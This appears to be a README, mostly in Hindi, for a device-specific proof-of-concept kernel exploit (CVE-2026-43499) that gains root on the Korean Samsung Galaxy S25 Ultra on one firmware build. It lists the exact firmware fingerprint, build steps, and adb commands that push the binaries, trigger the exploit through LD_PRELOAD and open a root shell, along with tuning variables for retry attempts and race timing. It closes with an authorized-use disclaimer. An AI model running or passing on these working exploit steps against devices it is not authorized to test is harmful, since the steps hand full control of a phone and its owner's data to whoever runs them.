
स्टैंडअलोन CVE-2026-43499 PoC for Galaxy S25 Ultra SM-S938N S938NKSUACZF1
कोरियाई Samsung Galaxy S25 Ultra पर CVE-2026-43499 के लिए डिवाइस-विशिष्ट प्रमाण-अवधारणा।
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages
ऑफ़सेट और संरचना लेआउट केवल उपरोक्त फ़र्मवेयर के लिए मान्य हैं।
यह पोर्ट इस पर आधारित है:
b850d3bddc74c3328d5fbcc0568d21962b55d949अपस्ट्रीम Apache License 2.0 LICENSE में बरकरार है।
pa3q-S938NKSUACZF1 ऑफ़सेट और कर्नेल लेआउट जोड़े गए।system_unbound_wq user-mode-helper रूट पथ जोड़ा गया।ANDROID_NDK_HOME को Android NDK r29 या संगत टूलचेन पर सेट करें:
make -j8
आउटपुट:
build/cve-2026-43499
build/cve-2026-43499-root
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
एक्सप्लॉइट डिफ़ॉल्ट रूप से 16 स्वतंत्र प्रयास और 20,000 माइक्रोसेकंड का आधार pselect विलंब करता है। समय डेटा एकत्र करते समय उन्हें ओवरराइड करें:
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
अस्थायी रूट सत्र और बनाए रखे गए आवंटन रीबूट तक चलते हैं।
एक-क्लिक इंस्टॉलेशन और KernelSU समर्थन के लिए, Root My Galaxy का उपयोग करें।
केवल उन उपकरणों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आप स्पष्ट रूप से अधिकृत हैं।